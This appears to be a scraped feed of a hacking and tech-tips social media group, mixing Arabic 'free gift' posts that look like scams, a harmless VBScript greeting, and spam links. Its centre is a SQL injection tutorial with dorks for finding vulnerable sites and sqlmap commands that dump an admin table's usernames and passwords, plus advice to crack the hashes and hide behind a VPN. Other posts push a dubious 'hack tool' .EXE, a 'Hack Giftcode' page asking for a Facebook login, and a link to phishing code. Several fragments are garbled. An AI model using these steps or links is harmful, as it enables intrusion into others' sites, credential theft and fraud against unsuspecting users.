المجانيات أتنى أن تعجبكم ملاحظة : هده المجانيات ستصلكم في شهر إن شاء الله ‫#‏المجانية‬ الأولى : ''إحصل على كابل usb يصلك حتى باب منزلك'' لا تخطأ في العنوان لكي يصللك إلى المنزل رابط التسجيل للحصول على الكابل ==> http://goo.gl/V0g0Kp #المجانية الثانية ''إحصل على معجون أسنان colgate يصللك حتى باب بيتك مجانا'' رابط التسجيل للحصول على الهدية ==> http://goo.gl/oTT9tP #المجانية الثالثة إحصل على مجموعة من الأقلام الملونة تصللك حتى باب منزلك مجانا و بدون مقابل رابط التسجيل للحصول على الهدية ==> http://goo.gl/S4Imju #المجانية الرابعة إحصل على قميص بمقاصك يصللك حتى باب المنزل مجانا رابط التسجيل للحصول على الهدية ==> http://goo.gl/vd4tdt #المجانية الخامسة إحصل على بطاقة gastkclub مجانا تصلك حتى باب منزلك صورة إثبات الوصول : http://goo.gl/2PlI1y رابط التسجيل للحصول على الهدية : http://goo.gl/ol5j14 #المجانية السادسة إحصل على ملسقات للملابس مجانا تصلك حتى باب منزلك رابط الطلب من هنا : http://goo.gl/oI0WZb --------------------------

http://alltiptricksfreenetbyirfangtaisi.blogspot.com

http://alltiptricksfreenetbyirfangtaisi.blogspot.com

http://myawesometricks.blogspot.in/2014/11/earn-extra-money-with-your-websites.html

http://myawesometricks.blogspot.in/2014/11/earn-extra-money-with-your-websites.html

Make your Computer Welcome You

 

Make your Computer Welcome You:- Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome. Then you are at the right place, this article describes exactly how you can make your computer welcome you like this. With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username." Make Windows Greet you with a Custom Voice Message at Startup To use this trick, follow the instructions given below:- 1. Click on Start. Navigate to All Programs, Accessories and Notepad. 2. Copy and paste the exact code given below. Dim speaks, speech speaks="Welcometo your PC, Username" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks 3. Replace Username with your own name. 4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs". 5. Copy the saved file. 6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it. 7. Paste the file. Now when the next time you start your computer, Windows will welcome you in its own computerized voice. Note: For best results, it is recommended to change sound scheme to No Sounds. You can change the sound scheme to No Sounds by following the steps given below:- 1. Go to Control Panel. 2. Then click on Switch to Classic View. 3. Then Click on Sounds and Audio Devices. 4. Then Click on the Sounds Tab. 5. Select No Sounds from the Sound Scheme option. 6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu. 7. Click on OK. Try it yourself to see how it works. In my personal opinion, this is an excellent trick.

HOW TO HACK A WEBSITE?

 

HOW TO HACK A WEBSITE? Difficulty Level - Intermediate Requirements - Kali or Backtrack 5 or ubuntu with sqlmap installed Sqlinjection In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux. Introduction Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap. Now follow my steps to hack a website using sqlmap. Step 1 Find Sql vulnerable site. I will give you some dorks which may help you finding websites vulnerable to Sql Injection. Code: ]inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= Step 2 Test if the website is vulnerable ]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below: [Image: image1_zps1ba326d9.jpg] And press enter. If error appears Ok, so we found the target. Now let's go ahed. Step 3 Injection Type this command in the terminal and hit enter Code: sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs (Insert the url that we checked for Sql Vulnerability) Now we will get the database name of the website. We got the two database we will select database name. Let's get the tables of that database. For that we need to enter this command on terminal and after that hit Enter. Code: sqlmap -u "http://www.yourvictim/page.php?id=1" -D Database_name --tables Now we will get the tables list which is stored in the database we selected. Now lets grab the columns from the admin table , type on terminal: Code: sqlmap -u "http://www.yourvictim/page.php?id=1" -D database_name -T admin --columns Now we got the columns and we got user and pass Now let's grab the user and pass Code: sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump Now we have to decrypt the hash , there are also tutorial about hash decryption on CHF. The only thing which is left now is to find the admin page and remember to use Proxy/Vpn ! This is a short tutorial of Sql injection i am sure there much in this to be covered but you get the basic idea we will very soon release a video related to it on our youtube channel. this tutorial is for educational purpose Hacking website without mutual understanding may leads to crime enjoy

Delete Your Browsing History With Firefox's

 

Delete Your Browsing History With Firefox's New Delete Button And Search Anonymously With DuckDuckGo - Read Here: http://anonhq.com/firefox-celebrates-secure-10-years-addin…/

http://worldwideprogramers.blogspot.in/2013/06/38-things-that-you-should-know-while.html

http://worldwideprogramers.blogspot.in/2013/06/38-things-that-you-should-know-while.html

فية اضافة الثغرات ميتاسبلويت على الكالي لينكس How To Add Metasploit Exploits To Kali #par-leon HDz http://www.youtube.com/watch?v=YNgJOhI1V14&feature=youtu.be

فية اضافة الثغرات ميتاسبلويت على الكالي لينكس How To Add Metasploit Exploits To Kali #par-leon HDz http://www.youtube.com/watch?v=YNgJOhI1V14&feature=youtu.be 

why not show background image.

 

why not show background image. I added external css code in html
css code <link rel="stylesheet" type="text/css" href="home.css"/> in html

http://www.mediafire.com/download/ke96ynsp0cpfkoj/Candy+Crush+Soda+Saga+Hack+Tool+Free+Version.EXE

http://www.mediafire.com/download/ke96ynsp0cpfkoj/Candy+Crush+Soda+Saga+Hack+Tool+Free+Version.EXE

http://www.techingspot.tk/2014/02/how-to-invite-your-all-friends-at-once.html

http://www.techingspot.tk/2014/02/how-to-invite-your-all-friends-at-once.html

How to invite your all friends at once on new facebook invitation page or in a event

 

How to invite your all friends at once on new facebook invitation page or in a event. http://www.techingspot.tk/…/how-to-invite-your-all-friends-…

https://www.youtube.com/watch?v=llnRjLtaqGA&list=UU4x_99k6hxwjO9HcyfH4vuA

https://www.youtube.com/watch?v=llnRjLtaqGA&list=UU4x_99k6hxwjO9HcyfH4vuA

https://www.youtube.com/watch?v=llnRjLtaqGA&list=UU4x_99k6hxwjO9HcyfH4vuA

Hack Giftcode 2014 1. Login with Facebook Account

 

Hack Giftcode 2014 1. Login with Facebook Account 2. Chose giftcode Class A,B,C,D,R 3. Klick Hack Giftcode 4. Enjoy, Cek your Giftcode Link Hack : http://djrodje-vracevichack2014.hol.es

http://hackerzzworlds.blogspot.in/2014/11/wakpa-htmlxml-wapka-phishing-code-of.html

http://hackerzzworlds.blogspot.in/2014/11/wakpa-htmlxml-wapka-phishing-code-of.html

Making application to fetch the icon shows your basic blvigwal

 

Making application to fetch the icon shows your basic blvigwal. His scenes pleasant #aBoSoso https://www.youtube.com/watch?v=qtSvri3ohP4&feature=youtu.be